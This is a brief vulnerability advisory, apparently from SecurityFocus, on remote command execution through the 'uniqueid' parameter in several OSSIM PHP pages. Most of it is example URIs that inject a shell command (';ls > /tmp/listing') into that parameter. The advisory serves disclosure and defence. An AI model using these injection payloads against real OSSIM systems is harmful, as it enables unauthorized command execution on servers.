OSSIM 'uniqueid' Parameter Multiple Remote Command Execution Vulnerabilities

The following example URIs are available:

http://www.example.com/ossim/sem/wcl.php?uniqueid=1;ls%20%3E%20/tmp/listing
http://www.example.com/ossim/sem/storage_graphs.php?uniqueid=;ls%20%3E%20/tmp/listing;
http://www.example.com/ossim/sem/storage_graphs2.php?uniqueid=;ls%20%3E%20/tmp/listing;
http://www.example.com/ossim/sem/storage_graphs3.php?uniqueid=;ls%20%3E%20/tmp/listing;
http://www.example.com/ossim/sem/storage_graphs4.php?uniqueid=;ls%20%3E%20/tmp/listing;


 

Privacy Statement
Copyright 2010, SecurityFocus